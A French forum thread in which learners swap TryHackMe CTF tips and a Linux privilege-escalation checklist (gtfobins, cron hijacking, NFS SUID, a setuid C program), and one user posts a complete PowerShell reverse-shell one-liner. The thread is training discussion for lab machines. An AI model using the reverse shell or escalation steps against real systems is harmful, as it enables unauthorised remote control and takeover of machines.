Ce sujet a été résolu
Courage

Je viens de finir ce challenge :
https://tryhackme.com/room/brooklynninenine 60 points pour une challenge assez simple, je la suggère au débutant elle est sympa
il y a 4 mois
Courage

Challenge plutôt sympa :
https://tryhackme.com/room/easypeasyctf
Il te donne 330 points ! Tu bosse sur l'énumération ainsi que la stéganographie, je conseil linpeas.sh pour trouver l'élévation de privilèges
Il te donne 330 points ! Tu bosse sur l'énumération ainsi que la stéganographie, je conseil linpeas.sh pour trouver l'élévation de privilèges
il y a 4 mois
Je viens de finir ce challenge :
https://tryhackme.com/room/brooklynninenine 60 points pour une challenge assez simple, je la suggère au débutant elle est sympa
Effectivement, c'était 60 points gratuits
Enfin, y'a une semaine j'aurais sûrement mis beaucoup plus de temps, j'ai appris énormément de techniques très rapidement.
Je manquais de méthodologie.
Enfin, y'a une semaine j'aurais sûrement mis beaucoup plus de temps, j'ai appris énormément de techniques très rapidement.
Je manquais de méthodologie.
il y a 4 mois
Challenge plutôt sympa :
https://tryhackme.com/room/easypeasyctf
Il te donne 330 points ! Tu bosse sur l'énumération ainsi que la stéganographie, je conseil linpeas.sh pour trouver l'élévation de privilèges
Il te donne 330 points ! Tu bosse sur l'énumération ainsi que la stéganographie, je conseil linpeas.sh pour trouver l'élévation de privilèges
Je garde de côté parce que je suis pas très formé sur la stéganographie pour l'instant.
il y a 4 mois
Je viens de repasser premier, mais l'autre va sûrement rush des learning path pour débutant qui rapportent des points histoire de bien me casser les couilles...
il y a 4 mois
Je garde de côté parce que je suis pas très formé sur la stéganographie pour l'instant.
De mon côté il faut vraiment que je fasse le path des privilèges escalation, c'est là où j'ai encore du mal une fois mon shell upload
Si le deuxième à le premium il peut facilement rush des paths easy en plus, j'ai amassé énormément de points dû à ça
Si le deuxième à le premium il peut facilement rush des paths easy en plus, j'ai amassé énormément de points dû à ça
il y a 4 mois
De mon côté il faut vraiment que je fasse le path des privilèges escalation, c'est là où j'ai encore du mal une fois mon shell upload
Si le deuxième à le premium il peut facilement rush des paths easy en plus, j'ai amassé énormément de points dû à ça
Si le deuxième à le premium il peut facilement rush des paths easy en plus, j'ai amassé énormément de points dû à ça
Si tu parles de celui-la :
https://tryhackme.com/room/linprivesc
Effectivement, elle est très complète et m'a appris beaucoup de techniques et surtout des bases méthodologiques pour énumérer les vecteurs potentiels d'escalade.
Effectivement, elle est très complète et m'a appris beaucoup de techniques et surtout des bases méthodologiques pour énumérer les vecteurs potentiels d'escalade.
il y a 4 mois
En gros, je pense qu'on peut se servir de cette room comme "d'algorithme" une fois qu'on a trouvé un accès dans la machine cible d'un challenge.
Une fois un reverse-shell avec privilèges restreints uploadé dans un room de challenge, tu peux tester les points suivants :
- Exploits du kernel (linpeas.sh peut aider)
- Sudo => gtfobins
- SUID => gtfobins
- Capabilities => cap_setuid
- Tâches CRON => Tâche encore présente en config mais script supprimé dans un répertoire auquel l'utilisateur qu'on utilise a un accès en écriture (donc il suffit de réécrire le script qu'on veut (un script malveillant donc))
- Network File Sharing (possibilité de chmod +s localement avant que le script malveillant soit répliqué sur la cible)
- PATH
Une fois un reverse-shell avec privilèges restreints uploadé dans un room de challenge, tu peux tester les points suivants :
- Exploits du kernel (linpeas.sh peut aider)
- Sudo => gtfobins
- SUID => gtfobins
- Capabilities => cap_setuid
- Tâches CRON => Tâche encore présente en config mais script supprimé dans un répertoire auquel l'utilisateur qu'on utilise a un accès en écriture (donc il suffit de réécrire le script qu'on veut (un script malveillant donc))
- Network File Sharing (possibilité de chmod +s localement avant que le script malveillant soit répliqué sur la cible)
- PATH
il y a 4 mois
Pour chopper un CDI oui
mais en freelance je faisais mes sous bien avant d'avoir l'OSCP
mais en freelance je faisais mes sous bien avant d'avoir l'OSCP
Tu t'es formé combien de temps réellement jusqu'à l'obtention de l'OSCP?
Mariama ou l'Oracle de Mayotte
il y a 4 mois
Pour te faire gagner du temps :
Si a un moment tu as une erreur avec gcc lors de la compilation ou lors du lancement d'un binaire c'est qu'il faut compiler le programme avec l'option --static pour inclure tes bibliothèques dans l'exécutable.
Le walkthrough ne précise pas ça, et lorsqu'ils te donnent un programme c à compiler, ils te précisent pas non plus qu'il faut include unistd.h et une autre bibliothèque (ça concerne les appels des fonctions setuid(..) setgid(...) et system(...) )
Si a un moment tu as une erreur avec gcc lors de la compilation ou lors du lancement d'un binaire c'est qu'il faut compiler le programme avec l'option --static pour inclure tes bibliothèques dans l'exécutable.
Le walkthrough ne précise pas ça, et lorsqu'ils te donnent un programme c à compiler, ils te précisent pas non plus qu'il faut include unistd.h et une autre bibliothèque (ça concerne les appels des fonctions setuid(..) setgid(...) et system(...) )
il y a 4 mois
Si tu parles de celui-la :
https://tryhackme.com/room/linprivesc
Effectivement, elle est très complète et m'a appris beaucoup de techniques et surtout des bases méthodologiques pour énumérer les vecteurs potentiels d'escalade.
Effectivement, elle est très complète et m'a appris beaucoup de techniques et surtout des bases méthodologiques pour énumérer les vecteurs potentiels d'escalade.
Effectivement je parle de celle là, je pense que je vais la faire aujourd'hui, ça me permettras de compléter le path Jr Penetration Tester en même temps
C'est vraiment ce qui me manque une fois le reverse shell upload, des connaissances plus approfondis sur comment élever mes privilèges.
J'ai fais une machine tout à l'heure où je devais justement élevé mes privilèges via un cronjob caché, c'était bien sympa bien que assez simple, merci linpeas
C'est vraiment ce qui me manque une fois le reverse shell upload, des connaissances plus approfondis sur comment élever mes privilèges.
J'ai fais une machine tout à l'heure où je devais justement élevé mes privilèges via un cronjob caché, c'était bien sympa bien que assez simple, merci linpeas
il y a 4 mois
Me0w
4 mois
Pour te faire gagner du temps :
Si a un moment tu as une erreur avec gcc lors de la compilation ou lors du lancement d'un binaire c'est qu'il faut compiler le programme avec l'option --static pour inclure tes bibliothèques dans l'exécutable.
Le walkthrough ne précise pas ça, et lorsqu'ils te donnent un programme c à compiler, ils te précisent pas non plus qu'il faut include unistd.h et une autre bibliothèque (ça concerne les appels des fonctions setuid(..) setgid(...) et system(...) )
Si a un moment tu as une erreur avec gcc lors de la compilation ou lors du lancement d'un binaire c'est qu'il faut compiler le programme avec l'option --static pour inclure tes bibliothèques dans l'exécutable.
Le walkthrough ne précise pas ça, et lorsqu'ils te donnent un programme c à compiler, ils te précisent pas non plus qu'il faut include unistd.h et une autre bibliothèque (ça concerne les appels des fonctions setuid(..) setgid(...) et system(...) )
Bon à savoir ça, je ne savais pas qu'ils te faisaient aussi compiler des programmes
il y a 4 mois
Bon à savoir ça, je ne savais pas qu'ils te faisaient aussi compiler des programmes
Rien de méchant du tout.
Le programme t'es donné, et c'est juste ça :
int main() {
setuid(0);
setgid(0);
system("thm");
}
Mais ce qu'ils disent pas c'est qu'il manque deux include (unistd, et un autre pour system).
include est une directive de préprocesseur qui sert à charger une bibliothèque (si jamais t'as jamais fait de c)
#include <nom_de_bibliotheque.h>
Et il faudra le compiler avec gcc --static path.c -o path
Comme ça quand tu devras lancer le programme, t'auras pas une erreur qui t'indique une référence indéfinie.. C'est dans la partie NFS si je me souviens bien.
Enfin tu verras, hésite pas si t'as besoin d'indices ou d'aide (comme je l'ai fait récemment)
Le programme t'es donné, et c'est juste ça :
int main() {
setuid(0);
setgid(0);
system("thm");
}
Mais ce qu'ils disent pas c'est qu'il manque deux include (unistd, et un autre pour system).
include est une directive de préprocesseur qui sert à charger une bibliothèque (si jamais t'as jamais fait de c)
#include <nom_de_bibliotheque.h>
Et il faudra le compiler avec gcc --static path.c -o path
Comme ça quand tu devras lancer le programme, t'auras pas une erreur qui t'indique une référence indéfinie.. C'est dans la partie NFS si je me souviens bien.
Enfin tu verras, hésite pas si t'as besoin d'indices ou d'aide (comme je l'ai fait récemment)
il y a 4 mois
Parce qu'en fait, dans la partie NFS de cette room, tu n'as pas gcc sur la machine cible, donc t'es obligé de compiler depuis ta machine, qui dit absence de gcc dit aussi absence de certaines bibliothèques, d'où l'importance d'inclure les bibliothèques dans le binaire lors de la compilation.
il y a 4 mois
Rien de méchant du tout.
Le programme t'es donné, et c'est juste ça :
int main() {
setuid(0);
setgid(0);
system("thm");
}
Mais ce qu'ils disent pas c'est qu'il manque deux include (unistd, et un autre pour system).
include est une directive de préprocesseur qui sert à charger une bibliothèque (si jamais t'as jamais fait de c)
#include <nom_de_bibliotheque.h>
Et il faudra le compiler avec gcc --static path.c -o path
Comme ça quand tu devras lancer le programme, t'auras pas une erreur qui t'indique une référence indéfinie.. C'est dans la partie NFS si je me souviens bien.
Enfin tu verras, hésite pas si t'as besoin d'indices ou d'aide (comme je l'ai fait récemment)
Le programme t'es donné, et c'est juste ça :
int main() {
setuid(0);
setgid(0);
system("thm");
}
Mais ce qu'ils disent pas c'est qu'il manque deux include (unistd, et un autre pour system).
include est une directive de préprocesseur qui sert à charger une bibliothèque (si jamais t'as jamais fait de c)
#include <nom_de_bibliotheque.h>
Et il faudra le compiler avec gcc --static path.c -o path
Comme ça quand tu devras lancer le programme, t'auras pas une erreur qui t'indique une référence indéfinie.. C'est dans la partie NFS si je me souviens bien.
Enfin tu verras, hésite pas si t'as besoin d'indices ou d'aide (comme je l'ai fait récemment)
Je vois, merci des infos je prends notes. Je comprends assez bien, j'ai fais du C quand j'étais à 42. J'ai commencé le module je suis sur "What the Shell ?", room premium qui t'apprends à faire des reverse shell/bind shell puis ensuite je passe sur linux privilege escalation , je te dirais ce que ça donne une fois dessus
il y a 4 mois
1234567
4 mois
Vous êtes sur Linux pour faire ça ?
Oui, mais perso j'utilise une VM kali linux (même si je suis déjà sur linux), t'as tout de pré-installé
il y a 4 mois
1234567
4 mois
Vous êtes sur Linux pour faire ça ?
J'utilise une VM kali parce que c'est extrêmement pratique et que j'aime pas faire du pentest sur mon OS principal (je suis sous linux mais ça change rien, windows sait aussi faire tourner des VM).
Peu importe l'os que tu utilises, tant que tu peux faire tourner une VM kali (ou toute autre distribution qui intègre des outils d'audit)
Edit : @Pepe a résumé en une ligne
Mais, si t'as quesiton était : faut-il avoir des connaissances sur l'utilisation de linux ? La réponse est oui, quasiment tous les serveurs sont sous linux, et tu dois élever tes privilèges une fois que tu as accès à la machine cible, donc une bonne connaissance de bash est fortement recommandée.
Peu importe l'os que tu utilises, tant que tu peux faire tourner une VM kali (ou toute autre distribution qui intègre des outils d'audit)
Edit : @Pepe a résumé en une ligne
Mais, si t'as quesiton était : faut-il avoir des connaissances sur l'utilisation de linux ? La réponse est oui, quasiment tous les serveurs sont sous linux, et tu dois élever tes privilèges une fois que tu as accès à la machine cible, donc une bonne connaissance de bash est fortement recommandée.
il y a 4 mois
@Me0w J'ai fais paniquer mon Windows en prenant des notes ayaa, j'ai noté un reverse-shell pour powershell dans Obsidian (app pour prendre des notes), dès le moment ou j'ai collé le reverse shell, mon Windows la détecté comme un virus et à supprimé mon fichier de notes
Le reverse-shell en question :
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Le reverse-shell en question :
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
il y a 4 mois
miko
4 mois
@Me0w J'ai fais paniquer mon Windows en prenant des notes ayaa, j'ai noté un reverse-shell pour powershell dans Obsidian (app pour prendre des notes), dès le moment ou j'ai collé le reverse shell, mon Windows la détecté comme un virus et à supprimé mon fichier de notes
Le reverse-shell en question :
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Le reverse-shell en question :
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Ahi, au moins windows defender fonctionne bien.
C'est ça que j'aime pas avec lui, parfois tu veux juste faire un truc légitime et t'es emmerdé par un faux positif..
C'est souvent le cas avec les jeux crackés, c'est pour ça que j'ai une partition windows 10 sans windows defender (et une autre avec)
(J'ai 2 windows et un linux)
C'est ça que j'aime pas avec lui, parfois tu veux juste faire un truc légitime et t'es emmerdé par un faux positif..
C'est souvent le cas avec les jeux crackés, c'est pour ça que j'ai une partition windows 10 sans windows defender (et une autre avec)
(J'ai 2 windows et un linux)
il y a 4 mois